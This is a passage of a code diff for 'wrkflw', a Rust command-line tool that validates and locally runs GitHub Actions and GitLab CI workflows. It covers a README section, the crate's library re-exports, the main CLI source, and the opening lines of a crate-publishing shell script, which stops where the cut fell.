```
|
||||
|
||||
### Quick start
|
||||
|
||||
```bash
|
||||
# Launch the TUI (auto-loads .github/workflows)
|
||||
wrkflw
|
||||
|
||||
# Validate all workflows in the default directory
|
||||
wrkflw validate
|
||||
|
||||
# Validate a specific file or directory
|
||||
wrkflw validate .github/workflows/ci.yml
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Run a workflow (Docker by default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
# Use Podman or emulation instead of Docker
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
wrkflw run --runtime emulation .github/workflows/ci.yml
|
||||
|
||||
# Open the TUI explicitly
|
||||
wrkflw tui
|
||||
wrkflw tui --runtime podman
|
||||
```
|
||||
|
||||
### Commands
|
||||
|
||||
- **validate**: Validate workflow/pipeline files and/or directories
|
||||
- GitHub (default): `.github/workflows/*.yml`
|
||||
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
|
||||
- Accepts multiple paths in a single invocation
|
||||
- Exit code behavior (by default): `1` when any validation failure is detected
|
||||
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
|
||||
|
||||
- **run**: Execute a workflow or pipeline locally
|
||||
- Runtimes: `docker` (default), `podman`, `emulation`
|
||||
- Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`
|
||||
|
||||
- **tui**: Interactive terminal interface
|
||||
- Browse workflows, execute, and inspect logs and job details
|
||||
|
||||
- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
|
||||
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
|
||||
- **list**: Show detected workflows and pipelines in the repo
|
||||
|
||||
### Environment variables
|
||||
|
||||
- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
|
||||
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)
|
||||
|
||||
### Exit codes
|
||||
|
||||
- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`)
|
||||
- `run`: `0` on success, `1` if execution fails
|
||||
|
||||
### Library usage
|
||||
|
||||
This crate re-exports subcrates for convenience if you want to embed functionality:
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let cfg = ExecutionConfig {
|
||||
runtime_type: RuntimeType::Docker,
|
||||
verbose: true,
|
||||
preserve_containers_on_failure: false,
|
||||
};
|
||||
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
|
||||
println!("status: {:?}", result.summary_status);
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
You can also run the TUI programmatically:
|
||||
|
||||
```rust
|
||||
use std::path::PathBuf;
|
||||
use wrkflw::executor::RuntimeType;
|
||||
use wrkflw::ui::run_wrkflw_tui;
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let path = PathBuf::from(".github/workflows");
|
||||
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
### Notes
|
||||
|
||||
- See the repository root README for feature details, limitations, and a full walkthrough.
|
||||
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
|
||||
- Emulation mode skips containerized steps and runs commands on the host.
|
||||
12
crates/wrkflw/src/lib.rs
Normal file
12
crates/wrkflw/src/lib.rs
Normal file
@@ -0,0 +1,12 @@
|
||||
pub use wrkflw_evaluator as evaluator;
|
||||
pub use wrkflw_executor as executor;
|
||||
pub use wrkflw_github as github;
|
||||
pub use wrkflw_gitlab as gitlab;
|
||||
pub use wrkflw_logging as logging;
|
||||
pub use wrkflw_matrix as matrix;
|
||||
pub use wrkflw_models as models;
|
||||
pub use wrkflw_parser as parser;
|
||||
pub use wrkflw_runtime as runtime;
|
||||
pub use wrkflw_ui as ui;
|
||||
pub use wrkflw_utils as utils;
|
||||
pub use wrkflw_validators as validators;
|
||||
707
crates/wrkflw/src/main.rs
Normal file
707
crates/wrkflw/src/main.rs
Normal file
@@ -0,0 +1,707 @@
|
||||
use bollard::Docker;
|
||||
use clap::{Parser, Subcommand, ValueEnum};
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[derive(Debug, Clone, ValueEnum)]
|
||||
enum RuntimeChoice {
|
||||
/// Use Docker containers for isolation
|
||||
Docker,
|
||||
/// Use Podman containers for isolation
|
||||
Podman,
|
||||
/// Use process emulation mode (no containers, UNSAFE)
|
||||
Emulation,
|
||||
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
fn from(choice: RuntimeChoice) -> Self {
|
||||
match choice {
|
||||
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
|
||||
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
|
||||
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
|
||||
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Parser)]
|
||||
#[command(
|
||||
name = "wrkflw",
|
||||
about = "GitHub & GitLab CI/CD validator and executor",
|
||||
version,
|
||||
long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --runtime emulation .github/workflows/build.yml # Use emulation mode instead of containers\n wrkflw run --runtime podman .github/workflows/build.yml # Use Podman instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
|
||||
)]
|
||||
struct Wrkflw {
|
||||
#[command(subcommand)]
|
||||
command: Option<Commands>,
|
||||
|
||||
/// Run in verbose mode with detailed output
|
||||
#[arg(short, long, global = true)]
|
||||
verbose: bool,
|
||||
|
||||
/// Run in debug mode with extensive execution details
|
||||
#[arg(short, long, global = true)]
|
||||
debug: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Subcommand)]
|
||||
enum Commands {
|
||||
/// Validate workflow or pipeline files
|
||||
Validate {
|
||||
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
|
||||
#[arg(value_name = "path", num_args = 0..)]
|
||||
paths: Vec<PathBuf>,
|
||||
|
||||
/// Explicitly validate as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
gitlab: bool,
|
||||
|
||||
/// Set exit code to 1 on validation failure
|
||||
#[arg(long = "exit-code", default_value_t = true)]
|
||||
exit_code: bool,
|
||||
|
||||
/// Don't set exit code to 1 on validation failure (overrides --exit-code)
|
||||
#[arg(long = "no-exit-code", conflicts_with = "exit_code")]
|
||||
no_exit_code: bool,
|
||||
},
|
||||
|
||||
/// Execute workflow or pipeline files locally
|
||||
Run {
|
||||
/// Path to workflow/pipeline file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
|
||||
/// Preserve Docker containers on failure for debugging (Docker mode only)
|
||||
#[arg(long)]
|
||||
preserve_containers_on_failure: bool,
|
||||
|
||||
/// Explicitly run as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
gitlab: bool,
|
||||
},
|
||||
|
||||
/// Open TUI interface to manage workflows
|
||||
Tui {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
|
||||
/// Preserve Docker containers on failure for debugging (Docker mode only)
|
||||
#[arg(long)]
|
||||
preserve_containers_on_failure: bool,
|
||||
},
|
||||
|
||||
/// Trigger a GitHub workflow remotely
|
||||
Trigger {
|
||||
/// Name of the workflow file (without .yml extension)
|
||||
workflow: String,
|
||||
|
||||
/// Branch to run the workflow on
|
||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value inputs for the workflow in format key=value
|
||||
#[arg(short, long, value_parser = parse_key_val)]
|
||||
input: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// Trigger a GitLab pipeline remotely
|
||||
TriggerGitlab {
|
||||
/// Branch to run the pipeline on
|
||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value variables for the pipeline in format key=value
|
||||
#[arg(short = 'V', long, value_parser = parse_key_val)]
|
||||
variable: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// List available workflows and pipelines
|
||||
List,
|
||||
}
|
||||
|
||||
// Parser function for key-value pairs
|
||||
fn parse_key_val(s: &str) -> Result<(String, String), String> {
|
||||
let pos = s
|
||||
.find('=')
|
||||
.ok_or_else(|| format!("invalid KEY=value: no `=` found in `{}`", s))?;
|
||||
|
||||
Ok((s[..pos].to_string(), s[pos + 1..].to_string()))
|
||||
}
|
||||
|
||||
// Make this function public for testing? Or move to a utils/cleanup mod?
|
||||
// Or call wrkflw_executor::cleanup and wrkflw_runtime::cleanup directly?
|
||||
// Let's try calling them directly for now.
|
||||
async fn cleanup_on_exit() {
|
||||
// Clean up Docker resources if available, but don't let it block indefinitely
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(3), async {
|
||||
match Docker::connect_with_local_defaults() {
|
||||
Ok(docker) => {
|
||||
// Assuming cleanup_resources exists in executor crate
|
||||
wrkflw_executor::cleanup_resources(&docker).await;
|
||||
}
|
||||
Err(_) => {
|
||||
// Docker not available
|
||||
wrkflw_logging::info("Docker not available, skipping Docker cleanup");
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Docker cleanup timed out after 3 seconds, continuing with shutdown",
|
||||
),
|
||||
}
|
||||
|
||||
// Always clean up emulation resources
|
||||
match tokio::time::timeout(
|
||||
std::time::Duration::from_secs(2),
|
||||
// Assuming cleanup_resources exists in wrkflw_runtime::emulation module
|
||||
wrkflw_runtime::emulation::cleanup_resources(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
|
||||
Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
|
||||
}
|
||||
|
||||
wrkflw_logging::info("Resource cleanup completed");
|
||||
}
|
||||
|
||||
async fn handle_signals() {
|
||||
// Set up a hard exit timer in case cleanup takes too long
|
||||
// This ensures the app always exits even if Docker operations are stuck
|
||||
let hard_exit_time = std::time::Duration::from_secs(10);
|
||||
|
||||
// Wait for Ctrl+C
|
||||
match tokio::signal::ctrl_c().await {
|
||||
Ok(_) => {
|
||||
println!("Received Ctrl+C, shutting down and cleaning up...");
|
||||
}
|
||||
Err(e) => {
|
||||
// Log the error but continue with cleanup
|
||||
eprintln!("Warning: Failed to properly listen for ctrl+c event: {}", e);
|
||||
println!("Shutting down and cleaning up...");
|
||||
}
|
||||
}
|
||||
|
||||
// Set up a watchdog thread that will force exit if cleanup takes too long
|
||||
// This is important because Docker operations can sometimes hang indefinitely
|
||||
let _ = std::thread::spawn(move || {
|
||||
std::thread::sleep(hard_exit_time);
|
||||
eprintln!(
|
||||
"Cleanup taking too long (over {} seconds), forcing exit...",
|
||||
hard_exit_time.as_secs()
|
||||
);
|
||||
wrkflw_logging::error("Forced exit due to cleanup timeout");
|
||||
std::process::exit(1);
|
||||
});
|
||||
|
||||
// Clean up containers
|
||||
cleanup_on_exit().await;
|
||||
|
||||
// Exit with success status - the force exit thread will be terminated automatically
|
||||
std::process::exit(0);
|
||||
}
|
||||
|
||||
/// Determines if a file is a GitLab CI/CD pipeline based on its name and content
|
||||
fn is_gitlab_pipeline(path: &Path) -> bool {
|
||||
// First check the file name
|
||||
if let Some(file_name) = path.file_name() {
|
||||
if let Some(file_name_str) = file_name.to_str() {
|
||||
if file_name_str == ".gitlab-ci.yml" || file_name_str.ends_with("gitlab-ci.yml") {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check if file is in .gitlab/ci directory
|
||||
if let Some(parent) = path.parent() {
|
||||
if let Some(parent_str) = parent.to_str() {
|
||||
if parent_str.ends_with(".gitlab/ci")
|
||||
&& path
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
{
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// If file exists, check the content
|
||||
if path.exists() {
|
||||
if let Ok(content) = std::fs::read_to_string(path) {
|
||||
// GitLab CI/CD pipelines typically have stages, before_script, after_script at the top level
|
||||
if content.contains("stages:")
|
||||
|| content.contains("before_script:")
|
||||
|| content.contains("after_script:")
|
||||
{
|
||||
// Check for GitHub Actions specific keys that would indicate it's not GitLab
|
||||
if !content.contains("on:")
|
||||
&& !content.contains("runs-on:")
|
||||
&& !content.contains("uses:")
|
||||
{
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() {
|
||||
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
|
||||
let default_panic_hook = std::panic::take_hook();
|
||||
std::panic::set_hook(Box::new(move |info| {
|
||||
let mut is_broken_pipe = false;
|
||||
if let Some(s) = info.payload().downcast_ref::<&str>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if let Some(s) = info.payload().downcast_ref::<String>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if is_broken_pipe {
|
||||
// Treat as a successful, short-circuited exit
|
||||
std::process::exit(0);
|
||||
}
|
||||
// Fallback to the default hook for all other panics
|
||||
default_panic_hook(info);
|
||||
}));
|
||||
|
||||
let cli = Wrkflw::parse();
|
||||
let verbose = cli.verbose;
|
||||
let debug = cli.debug;
|
||||
|
||||
// Set log level based on command line flags
|
||||
if debug {
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
|
||||
wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
|
||||
} else if verbose {
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
|
||||
wrkflw_logging::info("Verbose mode enabled");
|
||||
} else {
|
||||
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
|
||||
}
|
||||
|
||||
// Setup a Ctrl+C handler that runs in the background
|
||||
tokio::spawn(handle_signals());
|
||||
|
||||
match &cli.command {
|
||||
Some(Commands::Validate {
|
||||
paths,
|
||||
gitlab,
|
||||
exit_code,
|
||||
no_exit_code,
|
||||
}) => {
|
||||
// Determine the paths to validate (default to .github/workflows when none provided)
|
||||
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
|
||||
vec![PathBuf::from(".github/workflows")]
|
||||
} else {
|
||||
paths.clone()
|
||||
};
|
||||
|
||||
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
|
||||
let force_gitlab = *gitlab;
|
||||
let mut validation_failed = false;
|
||||
|
||||
for validate_path in validate_paths {
|
||||
// Check if the path exists; if not, mark failure but continue
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
validation_failed = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
println!(
|
||||
"Validating {} workflow file(s) in {}...",
|
||||
entries.len(),
|
||||
validate_path.display()
|
||||
);
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
|
||||
if validation_failed && *exit_code && !*no_exit_code {
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::Run {
|
||||
path,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
gitlab,
|
||||
}) => {
|
||||
// Create execution configuration
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type: runtime.clone().into(),
|
||||
verbose,
|
||||
preserve_containers_on_failure: *preserve_containers_on_failure,
|
||||
};
|
||||
|
||||
// Check if we're explicitly or implicitly running a GitLab pipeline
|
||||
let is_gitlab = *gitlab || is_gitlab_pipeline(path);
|
||||
let workflow_type = if is_gitlab {
|
||||
"GitLab CI pipeline"
|
||||
} else {
|
||||
"GitHub workflow"
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
|
||||
|
||||
// Execute the workflow
|
||||
let result = wrkflw_executor::execute_workflow(path, config)
|
||||
.await
|
||||
.unwrap_or_else(|e| {
|
||||
eprintln!("Error executing workflow: {}", e);
|
||||
std::process::exit(1);
|
||||
});
|
||||
|
||||
// Print execution summary
|
||||
if result.failure_details.is_some() {
|
||||
eprintln!("❌ Workflow execution failed:");
|
||||
if let Some(details) = result.failure_details {
|
||||
if verbose {
|
||||
// Show full error details in verbose mode
|
||||
eprintln!("{}", details);
|
||||
} else {
|
||||
// Show simplified error info in non-verbose mode
|
||||
let simplified_error = details
|
||||
.lines()
|
||||
.filter(|line| line.contains("❌") || line.trim().starts_with("Error:"))
|
||||
.take(5) // Limit to the first 5 error lines
|
||||
.collect::<Vec<&str>>()
|
||||
.join("\n");
|
||||
|
||||
eprintln!("{}", simplified_error);
|
||||
|
||||
if details.lines().count() > 5 {
|
||||
eprintln!("\nUse --verbose flag to see full error details");
|
||||
}
|
||||
}
|
||||
}
|
||||
std::process::exit(1);
|
||||
} else {
|
||||
println!("✅ Workflow execution completed successfully!");
|
||||
|
||||
// Print a summary of executed jobs
|
||||
if true {
|
||||
// Always show job summary
|
||||
println!("\nJob summary:");
|
||||
for job in result.jobs {
|
||||
println!(
|
||||
" {} {} ({})",
|
||||
match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭️",
|
||||
},
|
||||
job.name,
|
||||
match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "success",
|
||||
wrkflw_executor::JobStatus::Failure => "failure",
|
||||
wrkflw_executor::JobStatus::Skipped => "skipped",
|
||||
}
|
||||
);
|
||||
|
||||
// Always show steps, not just in debug mode
|
||||
println!(" Steps:");
|
||||
for step in job.steps {
|
||||
let step_status = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭️",
|
||||
};
|
||||
|
||||
println!(" {} {}", step_status, step.name);
|
||||
|
||||
// If step failed and we're not in verbose mode, show condensed error info
|
||||
if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
|
||||
// Extract error information from step output
|
||||
let error_lines = step
|
||||
.output
|
||||
.lines()
|
||||
.filter(|line| {
|
||||
line.contains("error:")
|
||||
|| line.contains("Error:")
|
||||
|| line.trim().starts_with("Exit code:")
|
||||
|| line.contains("failed")
|
||||
})
|
||||
.take(3) // Limit to 3 most relevant error lines
|
||||
.collect::<Vec<&str>>();
|
||||
|
||||
if !error_lines.is_empty() {
|
||||
println!(" Error details:");
|
||||
for line in error_lines {
|
||||
println!(" {}", line.trim());
|
||||
}
|
||||
|
||||
if step.output.lines().count() > 3 {
|
||||
println!(" (Use --verbose for full output)");
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup is handled automatically via the signal handler
|
||||
}
|
||||
Some(Commands::TriggerGitlab { branch, variable }) => {
|
||||
// Convert optional Vec<(String, String)> to Option<HashMap<String, String>>
|
||||
let variables = variable
|
||||
.as_ref()
|
||||
.map(|v| v.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the pipeline
|
||||
if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
|
||||
eprintln!("Error triggering GitLab pipeline: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::Tui {
|
||||
path,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
}) => {
|
||||
// Set runtime type based on the runtime choice
|
||||
let runtime_type = runtime.clone().into();
|
||||
|
||||
// Call the TUI implementation from the ui crate
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(
|
||||
path.as_ref(),
|
||||
runtime_type,
|
||||
verbose,
|
||||
*preserve_containers_on_failure,
|
||||
)
|
||||
.await
|
||||
{
|
||||
eprintln!("Error running TUI: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::Trigger {
|
||||
workflow,
|
||||
branch,
|
||||
input,
|
||||
}) => {
|
||||
// Convert optional Vec<(String, String)> to Option<HashMap<String, String>>
|
||||
let inputs = input
|
||||
.as_ref()
|
||||
.map(|i| i.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the workflow
|
||||
if let Err(e) =
|
||||
wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
|
||||
{
|
||||
eprintln!("Error triggering GitHub workflow: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::List) => {
|
||||
list_workflows_and_pipelines(verbose);
|
||||
}
|
||||
None => {
|
||||
// Launch TUI by default when no command is provided
|
||||
let runtime_type = wrkflw_executor::RuntimeType::Docker;
|
||||
|
||||
// Call the TUI implementation from the ui crate with default path
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
|
||||
eprintln!("Error running TUI: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate a GitHub workflow file
|
||||
/// Returns true if validation failed, false if it passed
|
||||
fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitHub workflow file: {}... ", path.display());
|
||||
|
||||
// Use the ui crate's validate_workflow function
|
||||
match wrkflw_ui::validate_workflow(path, verbose) {
|
||||
Ok(_) => {
|
||||
// The detailed validation output is already printed by the function
|
||||
// We need to check if there were validation issues
|
||||
// Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
|
||||
// we need to call the evaluator directly to get the result
|
||||
match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
|
||||
Ok(result) => !result.is_valid,
|
||||
Err(_) => true, // Parse errors count as validation failure
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!("Error validating workflow: {}", e);
|
||||
true // Any error counts as validation failure
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate a GitLab CI/CD pipeline file
|
||||
/// Returns true if validation failed, false if it passed
|
||||
fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitLab CI pipeline file: {}... ", path.display());
|
||||
|
||||
// Parse and validate the pipeline file
|
||||
match wrkflw_parser::gitlab::parse_pipeline(path) {
|
||||
Ok(pipeline) => {
|
||||
println!("✅ Valid syntax");
|
||||
|
||||
// Additional structural validation
|
||||
let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);
|
||||
|
||||
if !validation_result.is_valid {
|
||||
println!("⚠️ Validation issues:");
|
||||
for issue in validation_result.issues {
|
||||
println!(" - {}", issue);
|
||||
}
|
||||
true // Validation failed
|
||||
} else {
|
||||
if verbose {
|
||||
println!("✅ All validation checks passed");
|
||||
}
|
||||
false // Validation passed
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Invalid");
|
||||
eprintln!("Validation failed: {}", e);
|
||||
true // Parse error counts as validation failure
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// List available workflows and pipelines in the repository
|
||||
fn list_workflows_and_pipelines(verbose: bool) {
|
||||
// Check for GitHub workflows
|
||||
let github_path = PathBuf::from(".github/workflows");
|
||||
if github_path.exists() && github_path.is_dir() {
|
||||
println!("GitHub Workflows:");
|
||||
|
||||
let entries = std::fs::read_dir(&github_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
if entries.is_empty() {
|
||||
println!(" No workflow files found in .github/workflows");
|
||||
} else {
|
||||
for entry in entries {
|
||||
println!(" - {}", entry.path().display());
|
||||
}
|
||||
}
|
||||
} else {
|
||||
println!("GitHub Workflows: No .github/workflows directory found");
|
||||
}
|
||||
|
||||
// Check for GitLab CI pipeline
|
||||
let gitlab_path = PathBuf::from(".gitlab-ci.yml");
|
||||
if gitlab_path.exists() && gitlab_path.is_file() {
|
||||
println!("GitLab CI Pipeline:");
|
||||
println!(" - {}", gitlab_path.display());
|
||||
} else {
|
||||
println!("GitLab CI Pipeline: No .gitlab-ci.yml file found");
|
||||
}
|
||||
|
||||
// Check for other GitLab CI pipeline files
|
||||
if verbose {
|
||||
println!("Searching for other GitLab CI pipeline files...");
|
||||
|
||||
let entries = walkdir::WalkDir::new(".")
|
||||
.follow_links(true)
|
||||
.into_iter()
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.file_name()
|
||||
.to_string_lossy()
|
||||
.ends_with("gitlab-ci.yml")
|
||||
&& entry.path() != gitlab_path
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
if !entries.is_empty() {
|
||||
println!("Additional GitLab CI Pipeline files:");
|
||||
for entry in entries {
|
||||
println!(" - {}", entry.path().display());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
179
publish_crates.sh
Executable file
179
publish_crates.sh
Executable file
@@ -0,0 +1,179 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
|
||||
|
||||
set -e
|
||||
|
||||
# Parse command line arguments
|
||||
COMMAND=${1:-""}
|
||||
VERSION_TYPE=${2:-""}
|
||||
DRY_RUN=""
|
||||
|
||||
show_help() {
|
||||
echo "Usage: $0 <command> [options]"
|
||||
echo ""
|
||||
echo "Commands:"
|
||||
echo " version <type> Update versions across workspace"
|
||||
echo " Types: patch, minor, major"
|
||||
echo " publish Publish all crates to crates.io"
|
||||
echo " release <type> Update versions and publish (combines version + publish)"
|
||||
echo " help Show this help message"
|
||||
echo ""
|
||||
echo "Options:"
|
||||
echo " --dry-run Test without making changes (for publish/release)"
|
||||
echo ""
|
||||
echo "Examples:"
|
||||
echo " $0 version minor # Bump to 0.7.0"
|
||||
echo " $0 publish --dry-run # Test publishing"
|
||||
echo " $0 release minor --dry-run # Test version bump + publish"
|
||||
echo " $0 release patch # Release patch version"
|
||||
}
|
||||
|
||||
# Parse dry-run flag from any position
|
||||
for arg in "$@"; do
|
||||
if [[ "$arg" == "--dry-run" ]]; then
|
||||
DRY_RUN="--dry-run"
|
||||
fi
|
||||
done
|
||||
|
||||
case "$COMMAND" in
|
||||
"help"|"-h"|"--help"|"")
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
"version")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
